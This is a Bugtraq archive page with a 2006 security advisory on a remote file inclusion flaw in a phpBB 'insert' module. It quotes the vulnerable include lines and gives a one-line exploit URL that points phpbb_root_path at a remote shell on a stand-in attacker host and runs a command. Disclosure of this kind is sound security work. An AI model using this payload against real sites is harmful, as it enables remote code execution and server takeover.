Home page logo
/

bugtraq logo Bugtraq mailing list archives

Phpbb insert mod Remote file include
From: By_KorsaN_Son () hotmail com
Date: 12 Oct 2006 17:34:20 -0000

$ BiyoSecurity.Org & SecurityWall.Org

$ Script Name : Phpbb insert module

$ versions : 0.1.0 and 0.1.1

$ Risk : High

$ Regard : KorsaN

$ Thanks : Liz0zim , RMx , TR_IP , DreamLord , Kubra

$ Vulnerable File : functions_mod_user.php

$ Vulnerable code : 

<-- code start -->


include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);
include_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);
include_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);
 

$ Exploit : 

www.victim.com/[path]/functions_mod_user.php?phpbb_root_path=http://hacker.com/shell.txt?&cmd=ls


  By Date           By Thread  

Current thread:
  • Phpbb insert mod Remote file include By_KorsaN_Son (Oct 13)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault